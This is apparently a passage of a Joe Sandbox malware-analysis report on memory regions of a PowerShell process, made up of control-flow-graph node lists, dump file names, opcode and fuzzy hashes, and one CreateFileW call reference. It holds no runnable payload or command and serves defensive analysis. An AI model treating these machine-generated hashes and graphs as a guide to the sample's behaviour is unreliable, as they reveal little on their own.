                                                                control_flow_graph 333 35f6337-35f6345 334 35f6397-35f639f 333->334 335 35f6347-35f6377 333->335 339 35f63a6-35f63a9 334->339 346 35f63a1 334->346 336 35f638d-35f6390 335->336 337 35f6379-35f6386 335->337 336->339 340 35f6392 336->340 337->336 345 35f6388 337->345 341 35f63bf-35f63dd 339->341 342 35f63ab-35f63b8 339->342 340->334 352 35f6d9f-35f6df0 341->352 353 35f63e3-35f63e7 341->353 342->341 350 35f63ba 342->350 349 35f6d95-35f6d9c 345->349 346->349 350->349 371 35f6df8-35f6e8b 352->371 372 35f6df2-35f6df7 352->372 354 35f63fb-35f6408 353->354 355 35f63e9-35f63f8 353->355 356 35f640a-35f640e 354->356 357 35f6410 354->357 355->354 360 35f6412-35f6419 356->360 357->360 530 35f641f call 35f6ef0 360->530 531 35f641f call 35f6ee0 360->531 362 35f6425-35f642d 363 35f642f 362->363 364 35f6434-35f6438 362->364 363->349 366 35f643a-35f6455 364->366 367 35f6458-35f6487 364->367 366->367 376 35f6489-35f649a 367->376 377 35f64a1-35f64a7 367->377 435 35f6e8d-35f6e90 371->435 436 35f6e91-35f6e93 371->436 376->377 379 35f64a9-35f64bb 377->379 380 35f64c2-35f64cb 377->380 379->380 381 35f64cd-35f64e1 380->381 382 35f64e8-35f6576 380->382 381->382 389 35f65db-35f65e8 382->389 390 35f6578-35f659b 382->390 394 35f664f-35f6672 389->394 395 35f65ea-35f6609 389->395 392 35f659d-35f65a2 390->392 393 35f65a4-35f65ab 390->393 396 35f65ae-35f65b0 392->396 393->396 402 35f6689-35f6690 394->402 403 35f6674-35f667d 394->403 408 35f660b-35f6622 395->408 409 35f6624-35f662f 395->409 396->389 399 35f65b2-35f65d7 396->399 399->389 405 35f66d3-35f66d9 402->405 406 35f6692 402->406 403->402 413 35f693f-35f695c 405->413 414 35f66df-35f6725 405->414 406->405 411 35f6699-35f66a4 406->411 412 35f66a6-35f66cb 406->412 421 35f6631-35f664d 408->421 409->421 411->405 412->405 428 35f695e-35f697f 413->428 429 35f6996-35f69d7 413->429 433 35f672b-35f6744 414->433 434 35f6867-35f686b 414->434 421->394 439 35f69dd-35f69e1 428->439 429->439 462 35f67bf-35f67d2 433->462 463 35f6746-35f6758 433->463 434->439 440 35f6871-35f688d 434->440 441 35f6eab-35f6eb7 436->441 442 35f6e95-35f6e9b 436->442 448 35f6a03-35f6b7a 439->448 449 35f69e3-35f69e7 439->449 470 35f688f-35f6894 440->470 471 35f68c5-35f68d8 440->471 457 35f6ecf-35f6ed1 441->457 458 35f6eb9-35f6ebf 441->458 443 35f6e9f-35f6ea9 442->443 444 35f6e9d 442->444 443->441 444->441 526 35f6b7f-35f6bd7 448->526 452 35f69e9 449->452 453 35f69f3-35f69fc 449->453 452->453 453->448 465 35f6ed7-35f6edf 457->465 466 35f6ed3-35f6ed6 457->466 460 35f6ec3-35f6ec5 458->460 461 35f6ec1 458->461 460->457 461->457 469 35f6864 462->469 478 35f675e-35f6762 463->478 479 35f6826-35f685d 463->479 469->434 474 35f68da-35f6935 470->474 475 35f6896-35f68c3 470->475 472 35f693c 471->472 472->413 474->472 475->470 475->471 481 35f67d7-35f681f 478->481 482 35f6764-35f67bd 478->482 479->469 481->479 482->462 482->463 526->349 530->362 531->362
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1f46f58316242afaeff6e6e928c86e8d7f7c731e4a4513e0dab276647bceaf8f
                                                                • Instruction ID: 98c7da69cb0eac41439e41e4c9a318b2e8b0a2d22b4c6dd8a5dcc1e8be17be45
                                                                • Opcode Fuzzy Hash: 1f46f58316242afaeff6e6e928c86e8d7f7c731e4a4513e0dab276647bceaf8f
                                                                • Instruction Fuzzy Hash: D4522C34A01218CFDB24DB24D854BADB7B2FF89304F1445E9D90AAB3A1DB35AD45CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 084170A8, Relevance: .6, Instructions: 634COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 532 84170a8-8417292 call 8412bb0 553 8417299-84174b2 532->553 580 8417687-8417856 553->580 581 84174b8-84174c8 553->581 623 8417956-841796d 580->623 624 841785c-8417951 580->624 584 84174d6 581->584 585 84174ca-84174d4 581->585 586 84174db-84174dd 584->586 585->586 588 84174e7-84174f5 586->588 589 84174df-84174e5 586->589 591 84174f7-8417686 588->591 589->591 630 841797d-841798b 623->630 631 841796f-841797b 623->631 645 8417aaa-8417ac2 624->645 633 8417991-8417aa2 630->633 631->633 633->645 647 8417ac4 645->647 648 8417ac9-8417afc 645->648 647->648 652 8417b09 648->652 653 8417afe 648->653 655 8417b0a 652->655 653->652 655->655
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d3c846804641da5b35a6e3d64389cbd80841748cf4d0b4f646d3b0fe95c268e
                                                                • Instruction ID: c75e50d1eca5561fc63ffd8b8d83fe793ffb2be63ff3f677b0919cbb9d056510
                                                                • Opcode Fuzzy Hash: 7d3c846804641da5b35a6e3d64389cbd80841748cf4d0b4f646d3b0fe95c268e
                                                                • Instruction Fuzzy Hash: 73429034A00219DFEB25DB64CC50BADB772EF88304F1485AAD9097B395DB719D81CFA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F7AD8, Relevance: .6, Instructions: 625COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01e760f0e4d183e1bb916800799daff4da23cb0fdb6e3be26fe6367d1d20c179
                                                                • Instruction ID: a3a5fca9fe36b535d9ee987b99b2ccaaffe74811896a3951553b07d0627d62ff
                                                                • Opcode Fuzzy Hash: 01e760f0e4d183e1bb916800799daff4da23cb0fdb6e3be26fe6367d1d20c179
                                                                • Instruction Fuzzy Hash: D532D034A00205AFC715DF28D894E6AFBB2FF89310F5985A9EA159B371C732EC51CB91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035FC9D0, Relevance: .4, Instructions: 370COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 974 35fc9d0-35fc9fa call 35fbef0 978 35fc9fc-35fca01 974->978 979 35fca42-35fca66 974->979 980 35fca16-35fca27 978->980 981 35fca03-35fca0f 978->981 985 35fca6d-35fcad0 979->985 980->985 986 35fca29-35fca41 980->986 981->980 996 35fcad8-35fcadd 985->996 997 35fcad2-35fcad6 985->997 999 35fcaeb-35fcaff 996->999 997->996 998 35fcadf-35fcae3 997->998 1000 35fcb0c-35fcb89 998->1000 1001 35fcae5-35fcae8 998->1001 1002 35fcb05-35fcb09 999->1002 1008 35fcb8f-35fcbdd 1000->1008 1009 35fcc1c-35fcc2c 1000->1009 1001->999 1014 35fcbdf-35fcc02 1008->1014 1015 35fcc04-35fcc19 1008->1015 1012 35fcc32-35fcc95 1009->1012 1013 35fcce0-35fccf0 1009->1013 1022 35fccc8-35fccdd 1012->1022 1023 35fcc97-35fcc9d 1012->1023 1020 35fccf6-35fcd59 1013->1020 1021 35fcda4 1013->1021 1014->1015 1015->1009 1031 35fcd8c-35fcda1 1020->1031 1032 35fcd5b-35fcd61 1020->1032 1027 35fcdb0-35fcdb4 1021->1027 1022->1013 1024 35fcc9f-35fccc6 1023->1024 1024->1022 1029 35fcdba-35fce1d 1027->1029 1030 35fce68-35fce75 1027->1030 1038 35fce1f-35fce25 1029->1038 1039 35fce50-35fce65 1029->1039 1031->1021 1034 35fcd63-35fcd8a 1032->1034 1034->1031 1041 35fce27-35fce4e 1038->1041 1039->1030 1041->1039
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 01954d50d9e533a75dd47131ce7ab9fdb6cdb3f3d04778bcd0a500809e4860a7
                                                                • Instruction ID: e7c466dfbc4d2e8a0eb71f1f9ccc9b4438eced06fa4fa605a522c43c78434890
                                                                • Opcode Fuzzy Hash: 01954d50d9e533a75dd47131ce7ab9fdb6cdb3f3d04778bcd0a500809e4860a7
                                                                • Instruction Fuzzy Hash: 2FD18E35E007198FDB14CF65D840B9EBBB6FFC9304F2586A9D508AB251EB70A985CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0841709C, Relevance: .4, Instructions: 367COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1046 841709c-8417267 call 8412bb0 1067 841726e-8417292 1046->1067 1068 8417299-84174b2 1067->1068 1095 8417687-8417856 1068->1095 1096 84174b8-84174c8 1068->1096 1138 8417956-841796d 1095->1138 1139 841785c-8417951 1095->1139 1099 84174d6 1096->1099 1100 84174ca-84174d4 1096->1100 1101 84174db-84174dd 1099->1101 1100->1101 1103 84174e7-84174f5 1101->1103 1104 84174df-84174e5 1101->1104 1106 84174f7-8417686 1103->1106 1104->1106 1145 841797d-841798b 1138->1145 1146 841796f-841797b 1138->1146 1160 8417aaa-8417ac2 1139->1160 1148 8417991-8417aa2 1145->1148 1146->1148 1148->1160 1162 8417ac4 1160->1162 1163 8417ac9-8417afc 1160->1163 1162->1163 1167 8417b09 1163->1167 1168 8417afe 1163->1168 1170 8417b0a 1167->1170 1168->1167 1170->1170
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e84a3223ab9e179b86a1bbb4dac5ea682030b64dba86a248950b9ec079eae5f3
                                                                • Instruction ID: 08fc181611f032cf1324b07b5b667af1d747683353bdac20fee748741d04cd3a
                                                                • Opcode Fuzzy Hash: e84a3223ab9e179b86a1bbb4dac5ea682030b64dba86a248950b9ec079eae5f3
                                                                • Instruction Fuzzy Hash: A4E1B134A00219DFDB25DB64CC50BAEB7B2EF89304F1485AAD5097B391DF71AD81CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0531CB10, Relevance: .2, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8f882a0277125e2708302a4d30e4b49780f66b8728b3189768a296a4abbff58f
                                                                • Instruction ID: dcd2aadc3fbf00867d6c91661a7a2d09fd49c9c4d71fdac7ea326a6b682750a0
                                                                • Opcode Fuzzy Hash: 8f882a0277125e2708302a4d30e4b49780f66b8728b3189768a296a4abbff58f
                                                                • Instruction Fuzzy Hash: B6A16B74A40605CFE719DF34C498BAABBF2BF88304F149569D8029B3A5CB75EC85CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0846F868, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 846f868-846f89b call 846f274 4 846f8c6-846f95c 0->4 5 846f89d-846f8c5 0->5 14 846f964-846f99f CreateFileW 4->14 15 846f95e-846f961 4->15 16 846f9a1-846f9a7 14->16 17 846f9a8-846f9c5 14->17 15->14 16->17
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463300519.0000000008460000.00000040.00000001.sdmp, Offset: 08460000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8460000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 9ac370299097f7be69742d39ba35c34b3987bab88008f4c7bd6fc5dce4b4f7c5
                                                                • Instruction ID: e648900a1028099c4b673c82d22543bbcc3beb8f066cd6354ab8c4c08568127e
                                                                • Opcode Fuzzy Hash: 9ac370299097f7be69742d39ba35c34b3987bab88008f4c7bd6fc5dce4b4f7c5
                                                                • Instruction Fuzzy Hash: AB41AE75A04249AFDB00CFA9D840BAEFBB5FB49314F14816AE508AB380CB759954CFE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F4237, Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 20 35f4237-35f4282 22 35f4284-35f428e 20->22 23 35f4291-35f42d3 20->23 28 35f42dd-35f42e5 23->28 29 35f42d5-35f42db 23->29 30 35f42e7-35f42f4 28->30 29->30 32 35f42fa-35f430d 30->32 33 35f42f6 30->33 35 35f439c-35f43de 32->35 36 35f4313-35f431c 32->36 33->32 39 35f43e1-35f43e5 35->39 96 35f431f call 35f4b38 36->96 97 35f431f call 35f4af5 36->97 37 35f4325-35f438e 98 35f4391 call 35f4bf8 37->98 99 35f4391 call 35f4c08 37->99 41 35f43e7-35f440a 39->41 42 35f4411-35f4422 39->42 40 35f4397-35f439a 40->39 41->42 45 35f4428-35f4432 42->45 46 35f4534-35f4545 42->46 47 35f450e-35f452f 45->47 48 35f4438-35f4452 45->48 53 35f455a-35f457b 46->53 54 35f4547-35f4558 46->54 57 35f46be-35f46c8 47->57 55 35f4466-35f4480 48->55 56 35f4454-35f4461 48->56 53->57 54->53 64 35f4580-35f4591 54->64 68 35f448f-35f44a9 55->68 69 35f4482-35f448d 55->69 60 35f44f2-35f4509 56->60 58 35f46db-35f46fc 57->58 59 35f46ca-35f46d9 57->59 71 35f4703-35f4720 58->71 59->71 60->57 72 35f45b9-35f45c8 64->72 73 35f4593-35f45b4 64->73 76 35f44ab-35f44b8 68->76 77 35f44ba-35f44d4 68->77 69->60 80 35f45ce-35f45f3 72->80 81 35f4660-35f467f 72->81 73->57 76->60 83 35f44d6-35f44e3 77->83 84 35f44e5-35f44e8 77->84 87 35f45fd-35f465e 80->87 88 35f45f5 80->88 81->57 83->60 84->60 87->57 88->87 96->37 97->37 98->40 99->40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: "
                                                                • API String ID: 0-123907689
                                                                • Opcode ID: 6e1bbb709b4470fc3af03b1b2b0d2bc167bafaf1552c9c04fe67589442187aed
                                                                • Instruction ID: 402e56e7d648452d3fb71c7fe6eb55bd4ce3e9b7dfcbd219ff93bfd3dd98263c
                                                                • Opcode Fuzzy Hash: 6e1bbb709b4470fc3af03b1b2b0d2bc167bafaf1552c9c04fe67589442187aed
                                                                • Instruction Fuzzy Hash: 5AE10A74A002088FDB14DFA5D984BAEB7F6FF48304F248569D605AB3A1DB72AD45CF60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0846F274, Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 100 846f274-846f95c 103 846f964-846f99f CreateFileW 100->103 104 846f95e-846f961 100->104 105 846f9a1-846f9a7 103->105 106 846f9a8-846f9c5 103->106 104->103 105->106
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,C0000000,?,?,?,?,?,?,?,?,0846F887,00000000,00000000,00000003,00000000,00000002), ref: 0846F992
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463300519.0000000008460000.00000040.00000001.sdmp, Offset: 08460000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8460000_powershell.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 216b8ddef3fd597ae18b10e196f2a5a37bab0195897d74bbbd608354265c2b6d
                                                                • Instruction ID: 9271e2b5cce1b27e4a18c49c8d0a753eff339b22241d9dc16a45137675422946
                                                                • Opcode Fuzzy Hash: 216b8ddef3fd597ae18b10e196f2a5a37bab0195897d74bbbd608354265c2b6d
                                                                • Instruction Fuzzy Hash: 6A2125B5D00259EFCB10CF99D844AEEBBB4FB48324F04851AE918A7610C775A924CFE1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08410040, Relevance: .5, Instructions: 505COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 830 8410040-8410079 833 8410128-8410131 830->833 834 841007f-8410086 830->834 837 841013a-841013c 833->837 835 841008c-84100a9 834->835 836 841050f-8410533 834->836 846 84100c9-8410125 835->846 847 84100ab-84100c1 835->847 861 841053a-841056a 836->861 840 8410150-841016b 837->840 841 841013e-841014e 837->841 853 841016d-841017d 840->853 854 841017f 840->854 848 8410181-841018b 841->848 847->846 851 8410196-841019c 848->851 852 841018d 848->852 856 8410433-8410437 851->856 857 84101a2-84101a4 851->857 852->851 853->848 854->848 859 8410439-8410446 856->859 860 8410448-841044f 856->860 857->856 863 84101aa-84101ac 857->863 870 841048e-8410492 859->870 865 8410451-8410453 860->865 866 8410455-841045f 860->866 908 8410571-84105a1 861->908 868 84101b2-84101b6 863->868 869 8410425-8410428 863->869 872 8410467-841046b 865->872 866->872 868->861 875 84101bc-84101c6 868->875 869->870 877 8410494-84104b4 870->877 878 84104ba-84104d0 870->878 880 841048b 872->880 881 841046d-8410489 872->881 875->861 876 84101cc-84101d2 875->876 882 84101e4-84101f3 876->882 883 84101d4-84101de 876->883 877->878 890 84105a8-84105fa 877->890 891 84104d2-84104d5 878->891 892 84104de-841050c 878->892 880->870 881->880 894 84101f5-84101f9 882->894 895 841024d-8410263 882->895 883->861 883->882 940 84105fc-8410631 890->940 891->892 900 8410219-8410228 894->900 901 84101fb-8410211 894->901 898 84102f7-84102fe 895->898 899 8410269-841029b 895->899 906 8410300-8410316 898->906 907 841031e-8410377 898->907 929 84102bb-84102f2 899->929 930 841029d-84102b3 899->930 900->908 916 841022e-8410247 900->916 901->900 906->907 948 8410397-84103b1 907->948 949 8410379-841038f 907->949 908->890 916->895 916->908 929->870 930->929 953 8410663 940->953 954 8410633-8410659 940->954 960 84103b3-84103c5 948->960 961 84103fe-8410417 948->961 949->948 953->940 955 8410665 953->955 958 8410667-8410673 954->958 964 841065b-841065d 954->964 955->958 968 84103e5-84103fc 960->968 969 84103c7-84103dd 960->969 965 8410422 961->965 966 8410419 961->966 964->953 965->869 966->965 968->960 968->961 969->968
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c1ab3a4fb50f809031f70fd7d71217462b5234796f5a3ba518757608820e1390
                                                                • Instruction ID: ba29961b6f5b61a856727c7a3a9f73b66cd229ecd465799b8562cf7468f2620c
                                                                • Opcode Fuzzy Hash: c1ab3a4fb50f809031f70fd7d71217462b5234796f5a3ba518757608820e1390
                                                                • Instruction Fuzzy Hash: 9C125974B00614DFCB14DF68D594AAEB7F2EF88605F24416DE406AB361CB75EC82CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F3BC8, Relevance: .3, Instructions: 322COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1172 35f3bc8-35f3bf0 1173 35f3bf9-35f3bfb 1172->1173 1174 35f3bf2 1172->1174 1178 35f4013-35f401a 1173->1178 1174->1173 1175 35f3f0d-35f3f10 1174->1175 1176 35f3dc3-35f3dcd 1174->1176 1177 35f3c00-35f3c5d 1174->1177 1179 35f3f17-35f3f25 1175->1179 1180 35f3f76-35f3f8c 1176->1180 1198 35f3ff6-35f4000 1177->1198 1199 35f3c63-35f3c72 1177->1199 1186 35f3f2b-35f3f39 1179->1186 1187 35f3e82-35f3ea6 1179->1187 1184 35f3d08-35f3d42 1180->1184 1185 35f3f92-35f3fa0 1180->1185 1220 35f3d48-35f3d5d 1184->1220 1221 35f3dd2-35f3de2 1184->1221 1189 35f3fae-35f3fb6 1185->1189 1190 35f3fa2-35f3fa5 1185->1190 1191 35f3f3b-35f3f3e 1186->1191 1192 35f3f47-35f3f53 1186->1192 1187->1179 1207 35f3ea8-35f3eba 1187->1207 1195 35f3fd9-35f3ff0 1189->1195 1190->1189 1191->1192 1192->1180 1197 35f3f55-35f3f5c 1192->1197 1195->1198 1195->1199 1197->1180 1200 35f3f5e-35f3f6e 1197->1200 1198->1178 1202 35f3c78-35f3cb9 1199->1202 1203 35f4002-35f4010 1199->1203 1200->1180 1224 35f3cbb-35f3cbe 1202->1224 1225 35f3cc2-35f3cd3 1202->1225 1203->1178 1207->1179 1216 35f3ebc-35f3edd 1207->1216 1216->1179 1226 35f3edf-35f3f08 1216->1226 1220->1221 1238 35f3d5f-35f3d6c call 35f4237 1220->1238 1229 35f3e0b-35f3e12 1221->1229 1230 35f3de4-35f3e03 1221->1230 1224->1225 1236 35f3cd9-35f3d02 1225->1236 1237 35f3fb8-35f3fbf 1225->1237 1226->1178 1233 35f3e24-35f3e4d 1229->1233 1234 35f3e14-35f3e22 1229->1234 1230->1229 1245 35f3e4f-35f3e7c 1233->1245 1234->1245 1236->1184 1236->1185 1237->1195 1243 35f3fc1-35f3fd1 1237->1243 1246 35f3d72-35f3d76 1238->1246 1243->1195 1245->1186 1245->1187 1246->1180 1250 35f3d7c-35f3d8e 1246->1250 1250->1180 1257 35f3d94-35f3dbe 1250->1257 1257->1178
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.441487657.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_35f0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 78f68d4c1440d669c93cc8ae3e15153cc49df6cf1834afcc1f50381547921e57
                                                                • Instruction ID: db47add218f3ff0a5e96f96281cd9d28ec1eb7c160c6d4ca923ffd3661aad764
                                                                • Opcode Fuzzy Hash: 78f68d4c1440d669c93cc8ae3e15153cc49df6cf1834afcc1f50381547921e57
                                                                • Instruction Fuzzy Hash: DEE1E878A002058FDB14DF65D484D9DBBB2BF8C324F595698D905AB3A5DB30EC85CFA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 05316CB0, Relevance: .3, Instructions: 316COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1263 5316cb0-5316cd0 1264 5316cd2-5316cdc 1263->1264 1265 5316cde 1263->1265 1266 5316ce3-5316ce5 1264->1266 1265->1266 1267 5316ceb-5316d0e 1266->1267 1268 5316fcc-53170ff 1266->1268 1271 5316d10 1267->1271 1272 5316d15-5316d3c 1267->1272 1271->1272 1277 5316f22-5316f26 1272->1277 1278 5316d42-5316d55 1272->1278 1280 5316f54-5316f67 1277->1280 1281 5316f28-5316f2f 1277->1281 1289 5316d85-5316d87 1278->1289 1290 5316d57-5316d5b 1278->1290 1283 5316f69-5316f80 1280->1283 1284 5316f88-5316fa9 1280->1284 1342 5316f32 call 5317341 1281->1342 1343 5316f32 call 5317358 1281->1343 1283->1284 1291 5316fb3 1284->1291 1292 5316fab 1284->1292 1288 5316f38-5316f4d 1288->1280 1289->1277 1293 5316d8d-5316dcf 1289->1293 1295 5316d83 1290->1295 1296 5316d5d-5316d7d 1290->1296 1291->1268 1292->1291 1308 5316dd1-5316df4 1293->1308 1309 5316dfc-5316e60 1293->1309 1295->1289 1296->1289 1304 5316d7f-5316d81 1296->1304 1304->1289 1308->1309 1322 5316e62-5316e85 1309->1322 1323 5316e8d-5316eaf 1309->1323 1322->1323 1327 5316eb1-5316ed4 1323->1327 1328 5316edc-5316f1b 1323->1328 1327->1328 1328->1277 1342->1288 1343->1288
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.448403496.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_5310000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9843d8f59de74306b81a05672003e84385373e6ef3c85d3a5b20cf4ab8a7291c
                                                                • Instruction ID: 6aec79133c1dad8aa7955a18959c3c09cc2928a2639d54de6b054439b41a3011
                                                                • Opcode Fuzzy Hash: 9843d8f59de74306b81a05672003e84385373e6ef3c85d3a5b20cf4ab8a7291c
                                                                • Instruction Fuzzy Hash: C8D15C74E002089FCB04DFA4D950AEEBBF6FF89304F248468D805AB395DB75AD45CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 08413AA8, Relevance: .3, Instructions: 301COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1344 8413aa8-8413cba 1390 8413cc0-8413d3f 1344->1390 1391 8413dea-8413e8c 1344->1391 1412 8413d41-8413d67 1390->1412 1413 8413db0-8413dd0 1390->1413 1402 8413e95-8413ebd 1391->1402 1403 8413e8e-8413e94 1391->1403 1403->1402 1420 8413d90-8413d96 1412->1420 1421 8413d69-8413d7b 1412->1421 1427 8413dd2 call 841bdd9 1413->1427 1428 8413dd2 call 841bde8 1413->1428 1417 8413dd8 1419 8413de0-8413de7 1417->1419 1420->1419 1422 8413d98-8413dad 1420->1422 1421->1420 1425 8413d7d-8413d88 1421->1425 1425->1420 1427->1417 1428->1417
                                                                Memory Dump Source
                                                                • Source File: 0000000F.00000002.463142967.0000000008410000.00000040.00000001.sdmp, Offset: 08410000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_15_2_8410000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 18d647488e8a6110bdef4d2e9cddbf8793875feb53a46e4bc9b1a53fc50b43ee
                                                                • Instruction ID: 6ebdbbc7dbab34fb0b16dac136a223609cfaf3308d049ad41f9fb0fa45ba86a2
                                                                • Opcode Fuzzy Hash: 18d647488e8a6110bdef4d2e9cddbf8793875feb53a46e4bc9b1a53fc50b43ee
                                                                • Instruction Fuzzy Hash: 48B17E38610205CFDB14EF64D854AAEB7A2FFC8208F58892DD1059B764DB74AD09CBE2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 035F3358, Relevance: .3, Instructions: 284COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
